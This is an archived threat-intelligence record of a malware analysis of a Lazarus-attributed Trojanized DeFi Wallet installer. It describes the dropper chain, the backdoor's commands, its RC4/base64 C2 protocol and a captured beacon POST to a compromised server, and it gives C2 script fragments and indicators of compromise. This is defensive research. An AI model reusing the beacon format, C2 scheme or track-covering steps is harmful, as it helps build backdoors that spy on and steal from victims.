{
	"id": "77d6e27b-e3cf-47e0-8cae-c5f03575079b",
	"created_at": "2026-04-06T00:08:57.062197Z",
	"updated_at": "2026-04-10T03:38:20.410151Z",
	"deleted_at": null,
	"sha1_hash": "1c210f2fdf044bbfba234e74a5c1f8561cfa2cba",
	"title": "Lazarus Trojanized DeFi app for delivering malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 752472,
	"plain_text": "Lazarus Trojanized DeFi app for delivering malware\r\nBy GReAT\r\nPublished: 2022-03-31 · Archived: 2026-04-05 17:30:04 UTC\r\nFor the Lazarus threat actor, financial gain is one of the prime motivations, with a particular emphasis on the cryptocurrency\r\nbusiness. As the price of cryptocurrency surges, and the popularity of non-fungible token (NFT) and decentralized finance\r\n(DeFi) businesses continues to swell, the Lazarus group’s targeting of the financial industry keeps evolving.\r\nWe recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a\r\nlegitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet, but also implants a malicious file\r\nwhen executed. This malware is a full-featured backdoor containing sufficient capabilities to control the compromised\r\nvictim. After looking into the functionalities of this backdoor, we discovered numerous overlaps with other tools used by the\r\nLazarus group.\r\nThe malware operator exclusively used compromised web servers located in South Korea for this attack. To take over the\r\nservers, we worked closely with the KrCERT and, as a result of this effort, we had an opportunity to investigate a Lazarus\r\ngroup C2 server. The threat actor configured this infrastructure with servers set up as multiple stages. The first stage is the\r\nsource for the backdoor while the goal of the second stage servers is to communicate with the implants. This is a common\r\nscheme used in Lazarus infrastructure.\r\nBackground\r\nIn the middle of December 2021, we noticed a suspicious file uploaded to VirusTotal. At first glance, it looked like a\r\nlegitimate application related to decentralized finance (DeFi); however, looking closer we found it initiating an infection\r\nscheme. 
When executed, the app drops both a malicious file and an installer for a legitimate application, launching the\r\nmalware with the created Trojanized installer path. Then, the spawned malware overwrites the legitimate application with\r\nthe Trojanized application. Through this process, the Trojanized application gets removed from the disk, allowing it to cover\r\nits tracks.\r\nInfection timeline\r\nInitial infection\r\nWhile it’s still unclear how the threat actor tricked the victim into executing the Trojanized application\r\n(0b9f4612cdfe763b3d8c8a956157474a), we suspect they sent a spear-phishing email or contacted the victim through social\r\nmedia. The hitherto unknown infection procedure starts with the Trojanized application. This installation package is\r\ndisguised as a DeFi Wallet program containing a legitimate binary repackaged with the installer.\r\nUpon execution, it acquires the next stage malware path (C:\\ProgramData\\Microsoft\\GoogleChrome.exe) and decrypts it\r\nwith a one-byte XOR (Key: 0x5D). In the process of creating this next malware stage, the installer writes the first eight\r\nbytes including the ‘MZ’ header to the file GoogleChrome.exe and pushes the remaining 71,164 bytes from the data section\r\nof the Trojanized application. Next, the malware loads the resource CITRIX_MEETINGS from its body and saves it to the\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 1 of 8\n\npath C:\\ProgramData\\Microsoft\\CM202025.exe. The resulting file is a legitimate DeFi Wallet application. Eventually, it\r\nexecutes the previously created malware with its file name as a parameter:\r\nC:\\ProgramData\\Microsoft\\GoogleChrome.exe “[current file name]”\r\nMalware creation diagram\r\nBackdoor creation\r\nThe malware (d65509f10b432f9bbeacfc39a3506e23) generated by the above Trojanized application is disguised as a benign\r\ninstance of the Google Chrome browser. 
Upon launch, the malware checks if it was provided with one argument before\r\nattempting to copy the legitimate application “C:\\ProgramData\\Microsoft\\CM202025.exe” to the path given as the command\r\nline parameter, which means overwriting the original Trojanized installer, almost certainly in an attempt to conceal its prior\r\nexistence. Next, the malware executes the legitimate file to deceive the victim by showing its benign installation process.\r\nWhen the user executes the newly installed program, it shows the DeFi Wallet software built with the public source code[1].\r\nScreenshot of the manipulated application\r\nNext, the malware starts initializing the configuration information. The configuration has the structure shown in the table\r\nbelow, consisting of flags, C2 server addresses, victim identification value, and time value. As the structure suggests, this\r\nmalware can hold up to five C2 addresses, but only three C2 servers are included in this case.\r\nOffset Length(bytes) Description\r\n0x00 4 Flag for starting C2 operation\r\n0x04 4 Random value to select C2 server\r\n0x08 4 Random value for victim identifier\r\n0x0C 0x208 C2 server address\r\n0x214 0x208 C2 server address\r\n0x41C 0x208 C2 server address\r\n0x624 0x208 C2 server address\r\n0x82C 0x208 C2 server address\r\n0xA34 0x464 Buffer for system information\r\n0xE98 0x400 Full cmd.exe path\r\n0x1298 0x400 Temporary folder path\r\n0x1698 8 Time to start backdoor operation\r\n0x16A0 4 Time interval\r\n0x16A4 4 Flag for gathering logical drives\r\n0x16A8 8 Flag for enumerating session information\r\n0x16B0 8 The time value for gathering logical drive and session information\r\nThe malware randomly chooses a C2 server address and sends a beacon signal to it. This signal is a hard-coded\r\n‘0x60D49D94’ DWORD without encryption; the response data returned from the C2 carries the same value. 
If the expected\r\nvalue from the C2 server is received, the malware starts its backdoor operation.\r\nFollowing further communication with the C2, the malware encrypts data by a predefined method. The encryption is done\r\nvia RC4 and the hard-coded key 0xD5A3 before additionally being encoded with base64.\r\nThe malware generates POST parameters with hard-coded names. The request type (msgID), victim identification value, and\r\na randomly generated value are merged into the ‘jsessid’ parameter. It also uses the ‘cookie’ parameter to store four\r\nrandomly generated four-byte values. These values are again encrypted with RC4 and additionally base64 encoded. Based\r\non our investigation of the C2 script, we observed this malware uses not only a parameter named ‘jsessid’, but also\r\n‘jcookie’.\r\nStructure of ‘jsessid’ parameter\r\nThe following HTTP request shows the malware attempting to connect to the C2 with the request type ‘60d49d98’ and a\r\nrandomly generated cookie value.\r\nPOST /include/inc.asp HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\r\nHost: emsystec.com\r\nContent-Length: 80\r\nCache-Control: no-cache\r\njsessid=60d49d980163be8f00019f91\u0026cookie=29f23f917ab01aa8lJ3UYA==2517757b7dfb47f1\r\nDepending on the response from the C2, the malware performs its instructed backdoor task. 
It carries various functionalities\r\nto gather system information and control the victim machine.\r\nCommand Description\r\n0x60D49D97 Set time configuration with the current time interval (default is 10) value\r\n0x60D49D9F Set time configuration with delivered data from C2 server\r\n0x60D49DA0 Gather system information, such as IP address, computer name, OS version, CPU architecture\r\n0x60D49DA1 Collect drive information including type and free size\r\n0x60D49DA2 Enumerate files (with file name, size, time)\r\n0x60D49DA3 Enumerate processes\r\n0x60D49DA4 Terminate process\r\n0x60D49DA5 Change working directory\r\n0x60D49DA6 Connect to a given IP address\r\n0x60D49DA7 File timestamping\r\n0x60D49DA8 Execute Windows command\r\n0x60D49DA9 Securely delete a file\r\n0x60D49DAA Spawn process with CreateProcessW API\r\n0x60D49DAB Spawn process with CreateProcessAsUserW API\r\n0x60D49DAC Spawn process with high integrity level\r\n0x60D49DAD Download file from C2 server and save to given file path\r\n0x60D49DAE Send file creation time and contents\r\n0x60D49DAF Add files to .cab file and send it to the C2 server\r\n0x60D49DB0 Collect a list of files at the given path\r\n0x60D49DB1 Send the configuration to the C2 server\r\n0x60D49DB2 Receive new configuration from the C2 server\r\n0x60D49DB3 Set config to the current time\r\n0x60D49DB4 Sleep 0.1 seconds and continue\r\nInfrastructure\r\nLazarus only used compromised web servers located in South Korea in this campaign. As a result of working closely with\r\nthe KrCERT in taking down some of them, we had a chance to look into the corresponding C2 script from one of the\r\ncompromised servers. The script described in this section was discovered in the following path:\r\nhttp://bn-cosmo[.]com/customer/board_replay[.]asp\r\nThe script is a VBScript.Encode ASP file, commonly used by the Lazarus group in their C2 scripts. 
After decoding, it shows\r\nthe string ’60d49d95′ as an error response code, whereas the string ’60d49d94′ is used as a success message. In addition, the\r\nconnection history is saved to the file ‘stlogo.jpg‘ and the C2 address for the next stage is stored in the file ‘globals.jpg‘\r\nlocated in the same folder.\r\nConfiguration of C2 script\r\nThis script checks what value is delivered in the ‘jcookie’ parameter and, if it’s longer than 24 characters, it extracts the first\r\neight characters as msgID. Depending on the msgID value, it calls different functions. The backdoor command and\r\ncommand execution result delivered by the backdoor get stored to global variables. We have seen this scheme in operation\r\nbefore with the Bookcode[2] cluster. This script uses the following variables as flags and buffers to deliver data and\r\ncommands between the backdoor and a second stage C2 server:\r\nlFlag: flag to signal that there is data to deliver to the backdoor\r\nlBuffer: buffer to store data to be later sent to the backdoor\r\ntFlag: flag to signal that there is a response from the backdoor\r\ntBuffer: buffer to store incoming data from the backdoor\r\nmsgID\r\nFunction\r\nname\r\nDescription\r\n60d49d98 TFConnect\r\nSave the ‘TID’ value (victim identifier) to the log file, send ‘jcookie’ value with the\r\nclient’s IP address after acquiring the next stage C2 address from the config file\r\n(globals.jpg). Forward the response from the next stage server to the client.\r\n60d49d99 TConnect\r\nDeliver the command to the backdoor:\r\nIf the lFlag is ‘true’, send lBuffer to the client. Reset ‘lBuffer’ and set lFlag to ‘false’.\r\nOtherwise, reset ‘tBuffer’ and set tFlag to ‘false’.\r\n60d49d9a LConnect\r\nSend the command and return the command execution result:\r\nSet ‘lBuffer’ value to ‘jcookie’ parameter, delivering ‘tBuffer’ to the client.\r\n60d49d9c Check\r\nRetrieve host information (computer name, OS version). 
Delete the configuration file,\r\nwhich saves the C2’s next stage address, if it exists. Then save the new configuration with\r\ndelivered data through the ‘jcookie’ parameter.\r\n60d49d9d LogDown Deliver log file after base64 encoding and then delete it.\r\nthe others N/A\r\nWrite connections with unknown/unexpected msgID (request type) data to a log file;\r\nentries are tagged with ‘xxxxxxxx’.\r\nAttribution\r\nWe believe with high confidence that the Lazarus group is linked to this malware as we identified similar malware in the\r\nCookieTime cluster. The CookieTime cluster, called LCPDot by JPCERT, was a malware cluster that was heavily used by\r\nthe Lazarus group until recently. We’ve seen the Lazarus group target the defence industry using the CookieTime cluster with a\r\njob opportunity decoy. We have already published several reports about this cluster to our Threat Intelligence Service\r\ncustomers, and we identified a Trojanized Citrix application (5b831eaed711d5c4bc19d7e75fcaf46e) with the same code\r\nsignature as the CookieTime malware. The backdoor discovered in the latest investigation, and the previously discovered\r\nTrojanized application, are almost identical. They share, among other things, the same C2 communication method, backdoor\r\nfunctionalities, random number generation routine and the same method to encrypt communication data. Also, this malware\r\nwas mentioned in an article by Ahnlab discussing connections with the CookieTime (aka LCPDot) malware.\r\nSame backdoor switch of old CookieTime malware\r\nIn turn, we identified that the CookieTime cluster has ties with the Manuscrypt and ThreatNeedle clusters, which are also\r\nattributed to the Lazarus group. This doesn’t only apply to the backdoor itself, but also to the C2 scripts, which show several\r\noverlaps with the ThreatNeedle cluster. 
We found almost all function and variable names to be the same, which means the operators\r\nrecycled the code base and generated corresponding C2 scripts for the malware.\r\nThreatNeedle C2 script from\r\nroit.co[.]kr/xyz/adminer/edit_fail_decoded.asp\r\nC2 script of this case\r\nfunctIon getIpAddress()\r\nOn ErroR resume next\r\nDim ip\r\nip=Request.SErVervariables(\"HTTP_CLIENT_IP\")\r\nIf ip=\"\"THen\r\nIp=ReQUest.ServervaRiAbLes(\"HTTP_X_FORWARDED_FOR\")\r\nIf ip=\"\"ThEn\r\nip=request.ServerVaRiables(\"REMOTE_ADDR\")\r\nEnd If\r\nEnd if\r\nGEtIpAdDress=ip\r\nEnd FuNction\r\n \r\nfUnctioN GetIpAddress()\r\nON Error Resume Next\r\nDim iP   \r\nip=ReqUest.ServerVaRiables(\"HTTP_CLIENT_IP\")\r\nIf ip=\"\"THEn\r\niP=Request.SErverVariaBleS(\"HTTP_X_FORWARDED\r\nIf ip=\"\"then\r\nip=reQuest.ServErVariables(\"REMOTE_ADDR\")\r\nEnD IF\r\nEnD If\r\nGEtipAddreSs=ip\r\nEnd FUnction\r\n \r\nAlmost identical scripts to fetch IP address of client\r\nThreatNeedle C2 script from:\r\nedujikim[.]com/pay_sample/INIstart.asp\r\nC2 script of this case\r\nSub writeDataToFile(strFileName, byData)\r\nDim objFSO, objFile, strFilePath\r\nConst ForAppending = 8\r\nstrFilePath = Server.MapPath(\".\") \u0026 \"\\\" \u0026 strFileName\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nSet objFile = objFSO.OpenTextFile(strFilePath, ForAppending, True)\r\nobjFile.Write byData\r\nobjFile.Close\r\nEnd Sub\r\n \r\nSub WritedatA(filepath,byData)\r\ndim objFSO,oBJFile\r\nConSt ForAppEnDing=8\r\nSet objFsO=CreateObject(\"Scripting.FileSystemObject\")\r\nSeT objFIle=objFso.OpENTextFile(filepaTh,FoRAppending,True)\r\nobjFilE.Write ByDatA\r\nobjFIle.CLose\r\nEnD Sub\r\n \r\nSimilar scripts to save data to a file\r\nConclusions\r\nIn a previous investigation we discovered that the BlueNoroff group, which is also linked to Lazarus, compromised another\r\nDeFi wallet program called MetaMask. 
As we can see in the latest case, the Lazarus and BlueNoroff groups attempt to\r\ndeliver their malware without drawing attention to it and have evolved sophisticated methods to lure their victims. The\r\ncryptocurrency and blockchain-based industry continues to grow and attract high levels of investment. For this reason, we\r\nstrongly believe Lazarus’s interest in this industry as a major source of financial gain will not diminish any time soon.\r\nIndicators of Compromise\r\nTrojanized DeFi application\r\n0b9f4612cdfe763b3d8c8a956157474a    DeFi-App.exe\r\nDropped backdoor\r\nd65509f10b432f9bbeacfc39a3506e23    %ProgramData%\\Microsoft\\GoogleChrome.exe\r\nSimilar backdoor\r\nFirst stage C2 servers (Legitimate, compromised)\r\nSecond stage C2 servers (Legitimate, compromised)\r\nhxxp://softapp[.]co[.]kr/sub/cscenter/privacy[.]asp\r\nhxxp://gyro3d[.]com/mypage/faq[.]asp\r\nMITRE ATT\u0026CK Mapping\r\nThis table contains all the TTPs identified in the analysis of the activity described in this report.\r\nTactic Technique Technique Name\r\nExecution T1204.002\r\nUser Execution: Malicious File\r\nUse Trojanized application to drop malicious backdoor\r\nPersistence T1547.001\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nRegister dropped 
backdoor to the Run registry key\r\nDefense Evasion\r\nT1070.004\r\nIndicator Removal on Host: File Deletion\r\nThe Trojanized application overwrites itself after creating a legitimate\r\napplication to remove its trace\r\nT1070.006\r\nIndicator Removal on Host: Timestomp\r\nBackdoor capable of timestomping specific files\r\nDiscovery\r\nT1057\r\nProcess Discovery\r\nList running processes with backdoor\r\nT1082\r\nSystem Information Discovery\r\nGather IP address, computer name, OS version, and CPU architecture with\r\nbackdoor\r\nT1083\r\nFile and Directory Discovery\r\nList files in some directories with backdoor\r\nT1124\r\nSystem Time Discovery\r\nGather system information with backdoor\r\nCommand and Control\r\nT1071.001\r\nApplication Layer Protocol: Web Protocols\r\nUse HTTP as C2 channel with backdoor\r\nT1573.001\r\nEncrypted Channel: Symmetric Cryptography\r\nUse RC4 encryption and base64 with backdoor\r\nExfiltration T1041\r\nExfiltration Over C2 Channel\r\nExfiltrates gathered data over C2 channels with backdoor\r\n[1] https://github.com/DeFiCh/app\r\n[2] APT Intel report: Lazarus Covet Covid19 Related Intelligence\r\nSource: https://securelist.com/lazarus-trojanized-defi-app/106195/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/lazarus-trojanized-defi-app/106195/"
	],
	"report_names": [
		"106195"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434137,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1c210f2fdf044bbfba234e74a5c1f8561cfa2cba.pdf",
		"text": "https://archive.orkl.eu/1c210f2fdf044bbfba234e74a5c1f8561cfa2cba.txt",
		"img": "https://archive.orkl.eu/1c210f2fdf044bbfba234e74a5c1f8561cfa2cba.jpg"
	}
}